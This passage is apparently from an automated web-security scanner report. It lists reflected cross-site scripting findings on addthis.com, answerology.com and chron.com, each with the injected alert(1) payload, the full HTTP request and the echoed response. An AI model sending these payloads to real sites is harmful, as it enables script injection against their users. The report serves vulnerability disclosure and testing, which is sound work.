Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api46704"-alert(1)-"69f100acbbe/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.317. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 284e1<script>alert(1)</script>9534fbcd57f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api284e1<script>alert(1)</script>9534fbcd57f/nai/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api284e1<script>alert(1)</script>9534fbcd57f/nai/optout?nocache=0.1942716</strong>
...[SNIP]...
4.318. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a867c<script>alert(1)</script>737b513d575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/naia867c<script>alert(1)</script>737b513d575/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/naia867c<script>alert(1)</script>737b513d575/optout?nocache=0.1942716</strong>
...[SNIP]...
4.319. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dfed"-alert(1)-"ce124e24cff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai1dfed"-alert(1)-"ce124e24cff/optout?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai1dfed"-alert(1)-"ce124e24cff/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.320. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c8bc2<script>alert(1)</script>7f6c4873669 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optoutc8bc2<script>alert(1)</script>7f6c4873669?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optoutc8bc2<script>alert(1)</script>7f6c4873669?nocache=0.1942716</strong>
...[SNIP]...
4.321. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3696e"-alert(1)-"254cc9bde45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optout3696e"-alert(1)-"254cc9bde45?nocache=0.1942716 HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: uid=4e37104432fe1148; psc=1; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%2C%226%22%3A%222230616255569715877%22%7D..1316270110.1EY|1316270110.60|1316270110.1FE|1316270110.1WV|1316270110.10R|1315247533.1OD; uvc=6|33,6|34,15|35,14|36,8|37; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 17:16:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optout3696e"-alert(1)-"254cc9bde45";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.322. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebf92<script>alert(1)</script>8158349078c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apiebf92<script>alert(1)</script>8158349078c/nai/status?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>apiebf92<script>alert(1)</script>8158349078c/nai/status?nocache=0.8186765</strong>
...[SNIP]...
4.323. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd083"-alert(1)-"36b6141386b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apibd083"-alert(1)-"36b6141386b/nai/status?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apibd083"-alert(1)-"36b6141386b/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.324. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8afa"-alert(1)-"f99fbc12877 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naib8afa"-alert(1)-"f99fbc12877/status?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naib8afa"-alert(1)-"f99fbc12877/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.325. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 44304<script>alert(1)</script>fcf0cec2c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai44304<script>alert(1)</script>fcf0cec2c3/status?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1411
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai44304<script>alert(1)</script>fcf0cec2c3/status?nocache=0.8186765</strong>
...[SNIP]...
4.326. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8130b"-alert(1)-"d3e149cbd10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/status8130b"-alert(1)-"d3e149cbd10?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/status8130b"-alert(1)-"d3e149cbd10";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...
4.327. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 476fa<script>alert(1)</script>1dde2efdc82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/status476fa<script>alert(1)</script>1dde2efdc82?nocache=0.8186765 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,56|37

Response

HTTP/1.0 404 Not Found
Date: Sat, 17 Sep 2011 16:44:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/status476fa<script>alert(1)</script>1dde2efdc82?nocache=0.8186765</strong>
...[SNIP]...
4.328. http://www.answerology.com/index.aspx [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ae0'%3balert(1)//bf29cf474c2 was submitted in the topic parameter. This input was echoed as d3ae0';alert(1)//bf29cf474c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.aspx?template=ads.ascx&topic=homepaged3ae0'%3balert(1)//bf29cf474c2&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:51 GMT
Content-Length: 1102
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html>
<body width="728" height="90" style="margin:0;text-align:center;text-valign:center;" >
<script type="text/javascript">
var segQS = parent.segQS;
</script>
<!-- begin 728x90 ad tag (tile=1)
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/hdm.answerology/;site=answerology;cat=homepaged3ae0';alert(1)//bf29cf474c2;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;' + (typeof(segQS) != "undefined" ? segQS : '') + 'ord=' + ord + '?" type="text/javascript">
...[SNIP]...
4.329. http://www.answerology.com/index.aspx [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerology.com
Path:   /index.aspx

Issue detail

The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eec4"><script>alert(1)</script>cf54cffbb8e was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.aspx?template=ads.ascx&topic=homepage2eec4"><script>alert(1)</script>cf54cffbb8e&tile=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:51 GMT
Content-Length: 1147
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html>
<body width="728" height="90" style="margin:0;text-align:center;text-valign:center;" >
<script type="text/javascript">
var segQS = parent.segQS;
</script>
<!-- begin 728x90 ad tag (tile=1)
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/hdm.answerology/;site=answerology;cat=homepage2eec4"><script>alert(1)</script>cf54cffbb8e;demo=adult;tile=1;sect=answerology;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...
4.330. http://www.chron.com/apps/adWiz/adWiz.mpl [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.chron.com
Path:   /apps/adWiz/adWiz.mpl

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beda0'%3bf3e70677a7b was submitted in the url parameter. This input was echoed as beda0';f3e70677a7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/adWiz/adWiz.mpl?url=www.stamfordadvocate.com/beda0'%3bf3e70677a7b&param=;site=sa;mode=production;version=11 HTTP/1.1
Host: www.chron.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:18 GMT
Server: Apache/2.2.9 (Debian)
Edge-control: cache-maxage=5m
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV"
Content-Type: application/x-javascript
Accept-Ranges: bytes
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:24:18 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 2260


/* adWiz.mpl cached on: Sat, 17 Sep 2011 11:23 CDT */

var OAS_sitepage = 'Not Used';
var OAS_listpos = 'Not Used';
var CiderJS = '11671';
var CiderAds = 'A728';
var OAS_query = '';
// pek: other value is 64.58.80.26
